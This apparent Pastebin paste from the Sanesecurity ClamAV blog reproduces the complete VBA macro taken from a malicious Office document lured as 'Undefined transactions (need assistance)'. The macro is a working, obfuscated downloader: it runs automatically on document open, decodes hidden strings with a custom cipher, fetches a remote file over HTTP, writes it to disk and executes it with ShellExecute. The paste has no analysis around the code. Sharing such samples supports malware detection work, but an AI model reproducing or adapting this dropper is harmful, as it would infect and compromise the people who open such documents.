API tools faq
paste
Advertisement
Sanesecurity

Undefined transactions (need assistance) decoded

Sanesecurity
Jan 20th, 2015
402
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.16 KB | None | 0 0
raw download clone embed print report
  1. Sanesecurity ClamAV blog: zero hour malware, phishing and scams
  2. A hopefully interesting blog from the world of zero hour malware, phishing, scams and spams
  3. http://sanesecurity.blogspot.co.uk/
  4.  
  5. Attribute VB_Name = "ThisDocument"
  6. Attribute VB_Base = "1Normal.ThisDocument"
  7. Attribute VB_GlobalNameSpace = False
  8. Attribute VB_Creatable = False
  9. Attribute VB_PredeclaredId = True
  10. Attribute VB_Exposed = True
  11. Attribute VB_TemplateDerived = True
  12. Attribute VB_Customizable = True
  13. Sub uiwefds()
  14. pKIOHiosdf
  15. End Sub
  16. Sub AutoOpen()
  17. uiwefds
  18. End Sub
  19. Sub Workbook_Open()
  20. uiwefds
  21. End Sub
  22. Function vyllq8a(ByVal vWebFile As String, ByVal pNJKBjkdsf As String) As Boolean
  23. Dim lLJ As Long, GYUbjsdf As Long, drdTYIdsf() As Byte
  24. GoTo F3EUlsL
  25. F3EUlsL:
  26.  
  27.  
  28.  
  29.  
  30.  
  31.  
  32.  
  33.  
  34. Set oNJBJkdsfsdf = CreateObject(mqkX0Ayu("xnuvx454F3ObhRKtaH48mm97Tj519WP2ANr45u4JYq3YzY448tkga4g2Zwpt950F2gB71SjK4sDGTrmn515CiD59I5EM1li92uy4wD54L3pk4k4j84LXio4f24LcNEq8DoN4A9Wz564Rs9wR56rQAGCpp4720h8aq5"))
  35. GoTo vIMF7E
  36. vIMF7E:
  37. oNJBJkdsfsdf.Open mqkX0Ayu("M3rH5hFO041489RxDGr613T71zeo9Ka5964UYBYn"), vWebFile, False
  38. GoTo RMAdNKcIJW
  39. RMAdNKcIJW:
  40. oNJBJkdsfsdf.Send
  41. Dim y0IiLysLq As String
  42.  
  43.  
  44.  
  45.  
  46.  
  47.  
  48.  
  49.  
  50.  
  51.  
  52.  
  53.  
  54.  
  55.  
  56.  
  57. drdTYIdsf = oNJBJkdsfsdf.responseBody
  58. GoTo vDvd1aJ
  59. vDvd1aJ:
  60.  
  61.  
  62.  
  63.  
  64.  
  65.  
  66.  
  67.  
  68. GYUbjsdf = FreeFile
  69. GoTo ryobDYUX
  70. ryobDYUX:
  71. If Dir(pNJKBjkdsf) <> "" Then Kill pNJKBjkdsf
  72. GoTo PeOZe
  73. PeOZe:
  74. Open pNJKBjkdsf For Binary Access Write As #GYUbjsdf
  75. GoTo bknS
  76. bknS:
  77. Put #GYUbjsdf, , drdTYIdsf
  78. GoTo B0AiUg
  79. B0AiUg:
  80. Close #GYUbjsdf
  81. Dim vIEdN As Currency
  82.  
  83. Set oNJBJkdsfsdf = Nothing
  84. Dim cIRt4Ae As Double
  85. Dim xlapp As Object
  86. GoTo YGt
  87. YGt:
  88. Set xlapp = CreateObject(mqkX0Ayu("SCmjZ3wFtp48p6S4j3bB68gQ424ku2lMIMd4kDw536yC45L3lOso6XE1um9cf3j2Dn4A0N7Wz447RVQ0r4PsH4C7BnMSrhg818uMt42G0A4pOw453TIJx6441mr0DTiCuKec41q58oTUH4UA07Y4Of4as8M72LE4U4g10JBV4Mrtuh662S4SKf6lh20Cgqxf"))
  89. GoTo JOP4E
  90. JOP4E:
  91. xlapp.ShellExecute Environ(mqkX0Ayu("uvZ46D7w2y55Fe2HkCdy0i6wb8k616ijc6u40jXmRC")) & mqkX0Ayu("LMXl35V8v819Qs891EL95020GA28x1B9501wJ9892r028Fzelo3B9o391950Cm1h989O2K0c28t1H794YH393946WT80f3O939aqwJ")
  92. GoTo QfmDLcA
  93. QfmDLcA:
  94. End Function
  95. Sub pKIOHiosdf()
  96. GoTo TWAl
  97. TWAl:
  98. HUIBuerwfds = mqkX0Ayu("JB8j4dV3n68L48r72u48B72Ep4u70LP42I4Sa3619kHb74h19w74vJ20M58da23W5s22HNT3941932rdKq2C31t02YO39k41s9qP32i22K68KZW2142gv19w32Jq2V05M8fnDz613yA422a2TC68243oLt62l352Nl2zj01m6N23O5p220Y16MI1dV9n74L44r94u46B62Ep4u36LP81I9Sa7445kHb78h49w14vJ44M10da19W3s24HNT7044368rdKq4C70t4Et17")
  99. Dim MBAbp As Boolean
  100.  
  101.  
  102.  
  103.  
  104.  
  105.  
  106.  
  107. vyllq8a HUIBuerwfds, Environ(mqkX0Ayu("WXGS5FO04h4e1c4oRxDm0r6GT64a62tm4A8k0IYBIn")) & mqkX0Ayu("VBJX39P56zdaY2Z19pSn3M2Q1S5K0CQbyc2so2362iy1gH5b0219zxKep3j2236keinWJgJV817EUB43q2eN15fL0D2A1N9Wz3rR22VP3D61a9j78BLH43E4BXxv35cGF160ZrO4xG3RD43JYTE")
  108.  
  109. End Sub
  110. Function mqkX0Ayu(InputStringToBeDecrypted As String) As String
  111. Dim rJ54OUtqS As String
  112. Dim sIrDHBnBj As Object
  113. Dim Dg3E As String
  114. Dim LeZ As Date
  115. Dim wsgK8OOm As String
  116. Dim jEORug As Object
  117. Dim pDYhkPBNg As String
  118. GoTo HyYIF
  119. HyYIF:
  120. Dim AIZv5X1Ct As String
  121. GoTo DERmyA
  122. DERmyA:
  123. Dim CFvi As Integer
  124. GoTo updG7ULj
  125. updG7ULj:
  126. Dim e6IwavHZ As Integer
  127. Dim dcFTKZgvE As Double
  128. On Error GoTo ErrorHandler
  129. Dim UUZahwG As Currency
  130. strTempText = InputStringToBeDecrypted
  131. Dim oQl As Date
  132. rJ54OUtqS = strTempText
  133. Dim picFbmq As String
  134. Dg3E = ""
  135. Dim yukk As Long
  136. rJ54OUtqS = Left(rJ54OUtqS, Len(rJ54OUtqS) - 4)
  137. GoTo Wo2aZS
  138. Wo2aZS:
  139. rJ54OUtqS = Right(rJ54OUtqS, Len(rJ54OUtqS) - 4)
  140. Dim gCwB As Long
  141. nCharSize = 0
  142. Dim vm0LeZbpak As Object
  143. Call Extract_Char_Size(rJ54OUtqS, nCharSize)
  144. Dim JP5IYI1CiQqn As Long
  145. Call Extract_Enc_Key(rJ54OUtqS, nCharSize, nEncKey)
  146. Dim EJY As Object
  147. nTextLenght = Len(rJ54OUtqS)
  148. GoTo lmAV
  149. lmAV:
  150. For nCounter = 1 To Len(rJ54OUtqS) Step nCharSize
  151. GoTo dXMo
  152. dXMo:
  153. pDYhkPBNg = Mid(rJ54OUtqS, nCounter, nCharSize)
  154. Dim sEWCoQ As Byte
  155. nChar = oLsDFg(pDYhkPBNg)
  156. Dim jXH As Boolean
  157. nChar2 = nChar / nEncKey
  158. GoTo YWv
  159. YWv:
  160. AIZv5X1Ct = Chr(nChar2)
  161. Dim lqsqsIrDH As Boolean
  162. Dg3E = Dg3E + AIZv5X1Ct
  163. Dim Z4Of As Object
  164. Next nCounter
  165. Dim PSvi8w As Byte
  166. Dim FgCwBe As Long
  167. Dim mFbuT0a6N As Variant
  168. Dg3E = Trim(Dg3E)
  169. Dim gs2EgnGcKiQ As String
  170. mqkX0Ayu = Dg3E
  171. Dim pdGqnG6Irod As Date
  172. Exit Function
  173. ErrorHandler:
  174. GoTo tak6AhD
  175. tak6AhD:
  176. End Function
  177.  
  178.  
  179. Sub Extract_Char_Size(ByRef rJ54OUtqS, ByRef nCharSize)
  180. Dim gfVj As String
  181. DecryptParts = DecryptParts & "/Extract_Char_Size/"
  182. Dim FbmqkXH As Boolean
  183. nLeft = Len(rJ54OUtqS) \ 2
  184. GoTo BeQcvqsIrD
  185. BeQcvqsIrD:
  186. strLeft = Left(rJ54OUtqS, nLeft)
  187. Dim rB6UIJ As Variant
  188. GoTo AZXwv
  189. AZXwv:
  190. nRight = Len(rJ54OUtqS) - nLeft
  191. Dim R8AtJP As Byte
  192. strRight = Right(rJ54OUtqS, nRight)
  193. Dim Tb8I As Boolean
  194. GoTo KiQqnPN
  195. KiQqnPN:
  196. strKeyEnc = Right(strLeft, 2)
  197. Dim h2IKZgvE As Double
  198. strKeySize = Left(strRight, 2)
  199. Dim afa As String
  200. strKeyEnc = viuOJK(strKeyEnc)
  201. GoTo X1aPSviu2a
  202. X1aPSviu2a:
  203. strKeySize = viuOJK(strKeySize)
  204. GoTo S0OBjfi2AsIB
  205. S0OBjfi2AsIB:
  206. nKeyEnc = Val(strKeyEnc)
  207. Dim yAdPbupdG As Boolean
  208. nKeySize = Val(strKeySize)
  209. GoTo cF3aJ5UvE
  210. cF3aJ5UvE:
  211. nCharSize = nKeySize - nKeyEnc
  212. Dim H7Um As Date
  213. rJ54OUtqS = Left(strLeft, Len(strLeft) - 2) + Right(strRight, Len(strRight) - 2)
  214. Dim XHy8Iviu2a As Byte
  215. End Sub
  216.  
  217. Function viuOJK(ByVal cString As String) As String
  218. DecryptParts = DecryptParts & "/ viuOJK/"
  219. GoTo QX0
  220. QX0:
  221. For nCounter = 1 To Len(cString)
  222. GoTo N01UZbpak
  223. N01UZbpak:
  224. pDYhkPBNg = Mid(cString, nCounter, 1)
  225. Dim eL6O6od As Date
  226. If IsNumeric(pDYhkPBNg) Then
  227. Dim frwrtW8IbAi As Double
  228. GoTo e3Ifr8OwGl
  229. e3Ifr8OwGl:
  230. strTempString = strTempString + pDYhkPBNg
  231. Dim fVja7U4Hm As Date
  232. Else
  233. strTempString = strTempString + "0"
  234. Dim KnKU As Double
  235. End If
  236. Next nCounter
  237. Dim PSvi8w As Byte
  238. Dim FgCwBe As Long
  239. Dim mFbuT0a6N As Variant
  240. viuOJK = strTempString
  241. Dim TCoYNMC0OsN As Variant
  242. End Function
  243.  
  244. Function oLsDFg(strTempText As String) As Integer
  245. DecryptParts = DecryptParts & "/ oLsDFg/"
  246. GoTo nG5AYDE3OP
  247. nG5AYDE3OP:
  248. strTempText = Trim(strTempText)
  249. Dim YWoTHh0UeU As Object
  250. For nCounter = 1 To Len(strTempText)
  251. Dim tSAZX As Long
  252. pDYhkPBNg = Mid(strTempText, nCounter, 1)
  253. Dim yY1UK As Currency
  254. If IsNumeric(pDYhkPBNg) Then
  255. Dim frwrtW8IbAi As Double
  256. GoTo e3Ifr8OwGl
  257. e3Ifr8OwGl:
  258. rJ54OUtqS = rJ54OUtqS + pDYhkPBNg
  259. GoTo lgkcA
  260. lgkcA:
  261. End If
  262. Next nCounter
  263. Dim PSvi8w As Byte
  264. Dim FgCwBe As Long
  265. Dim mFbuT0a6N As Variant
  266. nResult = Val(rJ54OUtqS)
  267. GoTo fiNsI0bp
  268. fiNsI0bp:
  269. oLsDFg = nResult
  270. Dim Q6OfVjapic As Byte
  271. End Function
  272.  
  273. Sub Extract_Enc_Key(ByRef rJ54OUtqS, ByVal nCharSize, ByRef nEncKey)
  274. Dim DFgCwB5Oqsq As Boolean
  275. DecryptParts = DecryptParts & "/Extract_Enc_Key/"
  276. GoTo M8AX
  277. M8AX:
  278. strEncKey = vbNullString
  279. GoTo tVUKXPeXCJ
  280. tVUKXPeXCJ:
  281. CFvi = Len(rJ54OUtqS) - nCharSize
  282. GoTo p41Iji
  283. p41Iji:
  284. nLeft = CFvi \ 2
  285. GoTo f5OFn2OJ3Oaaf
  286. f5OFn2OJ3Oaaf:
  287. strLeft = Left(rJ54OUtqS, nLeft)
  288. Dim rB6UIJ As Variant
  289. GoTo AZXwv
  290. AZXwv:
  291. nRight = CFvi - nLeft
  292. Dim EiU As Date
  293. strRight = Right(rJ54OUtqS, nRight)
  294. Dim Tb8I As Boolean
  295. GoTo KiQqnPN
  296. KiQqnPN:
  297. strEncKey = Mid(rJ54OUtqS, nLeft + 1, nCharSize)
  298. GoTo EdNC
  299. EdNC:
  300. strEncKey = viuOJK(strEncKey)
  301. Dim QCOUPRt As Byte
  302. nEncKey = Val(Trim(strEncKey))
  303. Dim Y2UcDCrGwNF As Object
  304. rJ54OUtqS = strLeft + strRight
  305. Dim KS0EHtVp As Boolean
  306. End Sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!